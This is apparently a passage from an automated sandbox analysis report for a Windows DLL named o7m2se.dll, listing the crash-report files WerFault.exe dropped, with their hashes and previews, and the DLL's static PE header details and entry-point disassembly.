              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D3A.tmp.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.455274796743089
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjg8fm8M4JCYCr1yFNmyq85mQE1ZESC5Smd:uITfFR7QgrsqYBJTmlVvmd
              MD5:D1C7DEA32C82ECF84C7292960E26ADD8
              SHA1:C7D55152943A8ED981AB2273661D66F666DB9D50
              SHA-256:0CAA56074F54FECFCFE579172D872E9908526B1230F3BACFFCEDDE39C1830767
              SHA-512:9CCDD3F112E874113AA471B1B06323E87CA61FAFB4E8A1DBE357EA70CCF30693C98B0EFCBB74BDB28F5C6060AFE220467CF7E2843E75C937F55C09D31952F4A1
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER82A6.tmp.dmp

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:55:35 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):56518
              Entropy (8bit):1.664675283576867
              Encrypted:false
              SSDEEP:192:n9eqM3A0bR2OC5FtzWz06XNGMRy0MXhe/TC:HMQOCxMQXhe/
              MD5:14612F74377F910516090FE2B62A3787
              SHA1:CC469E8E6C716A2CC7DEBF9DFF0A557027BEC40F
              SHA-256:68C4F9A8B80BF7CEBE647D6C7F8A23A2C1034D59CC2AB9123194F9405CCE7108
              SHA-512:1C4CFC109D47217A292889D2C148EB6AF37073CACA0D4BCD637347FCE44534F82F1CF2DBF6A185BCDBF867D8A9D48278F6152320AED5677A1AD8A389C3142FDA
              Malicious:false
              Preview:MDMP....... .......gE.b.........................................)..........T.......8...........T...........................T...........@....................................................................U...........B..............Lw................5.....T...........dE.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER8567.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8486
              Entropy (8bit):3.6942260817002595
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNirKQNt6Y2uVgmfv/OS7wxCpr189bfJQfm1m:RrlsNiGQNt6YXVgmfvWS6fefF
              MD5:0DE99ED7D770C04D2585379C5B7372D3
              SHA1:299731611EE887F72940803C80EE241B7F171613
              SHA-256:C2BBA2DD3FAF49D19FDC2AD3B26FA0CE0D4B4E130A4DC124FC231F96C2A6AC64
              SHA-512:D0AB3E5CC4CAB83DBF114476168ACEA23B93FD7D78C1B1DDDD6B53DC39402EDF4CA37E42146009675E9CF0282248913F1794EC2786274FC2639CD3FA256C5548
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.9.6.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER86EE.tmp.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.458953593114226
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjiQ8fm8M4JCYCrNFRyq85mQXZESC5Sgd:uITfFR7QgrsqYOJCMVvgd
              MD5:2BFACB20CDD6A3E3ADB73ADC9323AE48
              SHA1:9A8336E6065862DB6D0C56EE2CBF779A064119D7
              SHA-256:5EF0FEAE2E89F466DA6C998BA8C49F96540D6CD3A571354E959385F297B8EFA3
              SHA-512:0ABF813DA199FEA0519E76E52F8CF1B1DD9F76A0D72724F3F56000157EB304BA26ACACBE6ED1B832FA7440EFA9F3921A0B9968231FA9D01CDE4D08F23C666BD3
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD854.tmp.dmp

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:56:13 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):56910
              Entropy (8bit):1.7162249941239178
              Encrypted:false
              SSDEEP:192:dq9q90RzKOC5M6n/4+n0hopZuKg87cU3AUCIFW:99GCe6gDhopXU
              MD5:2B2E4EDD1FC15CB9ABC59050444F0321
              SHA1:967503C782F4F01236AF8D694174F446C08C3CDE
              SHA-256:995A13FFC27AB98D5F4874A4CDB3B935E4AC142AC47AAAD04417628771557222
              SHA-512:B3FAADB5F9FA0FD64C74DCE4D85CF08C15DFE322E5857A92CCF17B9D6EBBBB045BEEB296E00C722B75C3F70DC8A5ACA1597F474CF8FC8ADA436EF9532D744892
              Malicious:false
              Preview:MDMP....... ........E.b.........................................)..........T.......8...........T...............V...........T...........@....................................................................U...........B..............Lw................#!....T...........kE.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC7A.tmp.dmp

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:56:15 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):56914
              Entropy (8bit):1.6832665332999834
              Encrypted:false
              SSDEEP:192:vj5nq+A6mWjOC5t0X6TzGRjHfywXJ1mPqQcEyi1Qm8z407F6Vo:MrCP0XG81mPqzEyi1
              MD5:63D75260E2A597044ACF421B78FF11B3
              SHA1:D4BD292A83E3BAAFC0065A475392875C9D291629
              SHA-256:EA67556CEB673B610A8B679929A057F8106D2CC3856CA07FBDD8756D5258CA93
              SHA-512:B5041212B39840998F4A4430B278D9C2B91EF3E0FDD77B29A1989FDB55C857C1F1DFF2FA128306CC46B0F4C55D2646109EF332436FB0A5A23D35E9A3F47FD87B
              Malicious:false
              Preview:MDMP....... ........E.b.........................................)..........T.......8...........T...........X...............T...........@....................................................................U...........B..............Lw......................T...........mE.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD26.tmp.dmp

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:56:14 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):58426
              Entropy (8bit):1.6547530682830196
              Encrypted:false
              SSDEEP:192:SXwq+8VXOC5cndTyT3rjxcow+sqs7V2ME6kwGWeKEMmPbXz3cud:kKC2NyoQ6kwGfs
              MD5:AA8CDF5205F8318626752C678A83C2B9
              SHA1:7C0A13E0E9F37EB7262CD50A00FE9509B4DAF71A
              SHA-256:02BB724526850D91EB7E7874EFD01323A708ADE7EF8C0DA9B9090720A996BE67
              SHA-512:29C76E01037E9CA07FCB2B9775FB2A922CCA9A558A4955FC82FC38C3AAF78C20EDCCC7353CA6CA41B4CC0A92F85F326FA86A85600A6768BD27CCF2609E962B40
              Malicious:false
              Preview:MDMP....... ........E.b.........................................)..........T.......8...........T...........X...............T...........@....................................................................U...........B..............Lw......................T...........kE.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9AA.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8686
              Entropy (8bit):3.6984238938177976
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNi4LrNT6Y1fqUgmfv3SwAxCprO89bljsKf63m:RrlsNiErNT6YNRgmfv3SwLlIKfj
              MD5:E447CAD0A62DE837758793B5888A58F3
              SHA1:B27342028B61A2F86BF53078E81DD253B1A0BB73
              SHA-256:E441DB120E5700E068B68AA438698AABF5D695A854CC3DDEED747078F4F24ADB
              SHA-512:7AA174CF00FBAF1B99A1AE4474ACC334F0E04EF6F745A2C31489829FB942E8779236AD7CC1F662404B0CF8110925D206EBEC44F4417537458CC6AD3B50612D55
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB02.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8488
              Entropy (8bit):3.6935898208327784
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNi/tUNw6Y1UqUgmfv/OS7axCprm89bOVsafCam:RrlsNi1UNw6YmRgmfvWS5Ouaf2
              MD5:79D6936AA3EEFDA67E90578ACF5D34A2
              SHA1:383ECEB5937387731911B4198A4F639D32BEB1BC
              SHA-256:5D9DA4BDD3155C1946F6DD41176F04C3251E4236BB8FC4348852409D3D7F33B0
              SHA-512:D81446C6461D3567607B68D9B86ABC93A01DBBC5A1C2C953F23B1B53DDE39B08A022FF95DFF31126C3D8809916B6768CE3A25255307B3225455279442A0F898D
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.2.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WEREBAE.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8486
              Entropy (8bit):3.693020365748347
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNiHnQ9Nh6Y1cqUgmfvvSwTxCprb89bOJBfxam:RrlsNiw9Nh6YuRgmfvvSwJOvft
              MD5:F54C7F49DE79B7A17D94B0565F9D9709
              SHA1:7BC736EB7F6AB3A7E79A07CD39A4E34B2D116663
              SHA-256:13E19271898F19BAD81006D2BB8713DFC5EFCAE588572FD2EAFC3499C06EB0A4
              SHA-512:08E5C6E675C38B55CA02EAFF6616FE6F9AEC8FBE1AA19F8E8080771CE416E4E07237D368CAF923898A17CBE40E3A8D2E8DFB8D21003F2C91F2D3CAE32D9A0409
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.0.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERED64.tmp.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.45394533303562
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjv8fm8M4JCYCr1yFwyq85mQEDZESC5SDd:uITfFR7QgrsqYIJ6TVvDd
              MD5:4294A174CF58F3D1992B9DCED2744BCA
              SHA1:E5CCCBEE658C64468031C40E1852A5E18406F4DD
              SHA-256:DC4CF98197980A90F677B08BD94D759153BB85EAEC38E710E01E458CFA65FBE8
              SHA-512:0F79BF3120EC1D7F2CF111824E568E8337114D2265B4BA0C6D2F2A8AEEC46406E66EBDAF016F2DAEF7EAA5CE1CEDA0198F3DDFE6697A29CD78EEE9FC65B9E930
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE7D.tmp.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.45593096357786
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjC8fm8M4JCYCrNFcyq85mQFiZESC5S4d:uITfFR7QgrsqYLJfqiVv4d
              MD5:4B5E6C0DB407F321B15D4855989F3468
              SHA1:E7CC31D9F76A92409F5F6D6B6AA9C2C900D490FB
              SHA-256:940B51633D4CA5EA7418C9C8E62B1A627549C08E4C78699483FE078AC85D8834
              SHA-512:3BF75CA97CEEBF3E59472E0EB1A5526C3AC81367D7E71A8A95BA577EBE6172DFB44E07868B3210AD9302C338BE4C227D9C2997932E87D5CC946D3D34395E90D5
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF0A.tmp.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.457626084216517
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjw8fm8M4JCYCr18F3yq85mQE/ZESC5Syd:uITfFR7QgrsqY5JjPVvyd
              MD5:033260C88C7E418E8EAB858F344040AA
              SHA1:95668E1640481D060C68052E172A5F84DC1A1D1E
              SHA-256:6ACD6342E1390FA9F6B5D54F6082E05636B8E2A1A922E697D1CACE210F647B14
              SHA-512:3F1FB74BA03EB5A911033F736FB3CC8493AEA0EDA4DDE85E92B1DD4DEBAC98268F7E70F3250C385FCCA02B3048054FB22B981D961EB2D4E04A44044D31FC1BFE
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              Static File Info

              General

              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Entropy (8bit):6.249251858982643
              TrID:
              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
              • Win64 Executable (generic) (12005/4) 10.17%
              • Generic Win/DOS Executable (2004/3) 1.70%
              • DOS Executable Generic (2002/1) 1.70%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
              File name:o7m2se.dll
              File size:1530368
              MD5:cc9f20deaa66ffd5b96b727c2454e141
              SHA1:3b90678ff567417851e8c9953effeda2969abc4d
              SHA256:e6c6ad0411501c2d81863c0ecaf80ace8a5e9b6ce8329c5700890eb36991f6fb
              SHA512:55ba6429ba465b818714ac8a49fef427449788040b5b1156f562a2efec11185dbe3609859384044428bcad343a841420417a38e8387b0162f1d644edaa69004f
              SSDEEP:24576:VsxwIV3HSw5TaUMa1W8EvggEvioIqaKWZlP5xJNm9UomzbmhlgyCJ/5VUXb:VsxwIV3HSiTaUY8E4l67qKZfnNjzqjgq
              TLSH:FF65E05DCF2F8199DD13B4F1BEA3D2D24DA9B1449A5849B3172D19180E9303CE8DF2BA
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........i..c:..c:..c:...:..c:...:=.c:...:..c:..`;..c:..f;..c:..g;..c:b|.:..c:..b:..c:(.f;..c:(.c;..c:-..:..c:(.a;..c:Rich..c:.......

              File Icon

              Icon Hash:74f0e4ecccdce0e4

              Static PE Info

              General

              Entrypoint:0x18000320c
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x180000000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE
              Time Stamp:0x62C44638 [Tue Jul 5 14:10:00 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:f4a46a3d99fc0c7291a7b32c7cfb6621

              Entrypoint Preview

              Instruction
              dec eax
              mov dword ptr [esp+08h], ebx
              dec eax
              mov dword ptr [esp+10h], esi
              push edi
              dec eax
              sub esp, 20h
              dec ecx
              mov edi, eax
              mov ebx, edx
              dec eax
              mov esi, ecx
              cmp edx, 01h
              jne 00007F2CD0B71AF7h
              call 00007F2CD0B71EF0h
              dec esp
              mov eax, edi
              mov edx, ebx
              dec eax
              mov ecx, esi
              dec eax
              mov ebx, dword ptr [esp+30h]
              dec eax
              mov esi, dword ptr [esp+38h]
              dec eax
              add esp, 20h
              pop edi
              jmp 00007F2CD0B7196Ch
              int3
              int3
              int3
              dec eax
              sub esp, 28h
              call 00007F2CD0B72384h
              test eax, eax
              je 00007F2CD0B71B13h
              dec eax
              mov eax, dword ptr [00000030h]
              dec eax
              mov ecx, dword ptr [eax+08h]
              jmp 00007F2CD0B71AF7h
              dec eax
              cmp ecx, eax
              je 00007F2CD0B71B06h
              xor eax, eax
              dec eax
              cmpxchg dword ptr [00171858h], ecx
              jne 00007F2CD0B71AE0h
              xor al, al
              dec eax
              add esp, 28h
              ret
              mov al, 01h
              jmp 00007F2CD0B71AE9h
              int3
              int3
              int3
              dec eax
              sub esp, 28h
              call 00007F2CD0B72348h
              test eax, eax
              je 00007F2CD0B71AF9h
              call 00007F2CD0B7216Fh
              jmp 00007F2CD0B71B0Bh
              call 00007F2CD0B72330h
              mov ecx, eax
              call 00007F2CD0B75B9Dh
              test eax, eax
              je 00007F2CD0B71AF6h
              xor al, al
              jmp 00007F2CD0B71AF9h
              call 00007F2CD0B76048h
              mov al, 01h
              dec eax
              add esp, 28h
              ret
              dec eax
              sub esp, 28h
              xor ecx, ecx
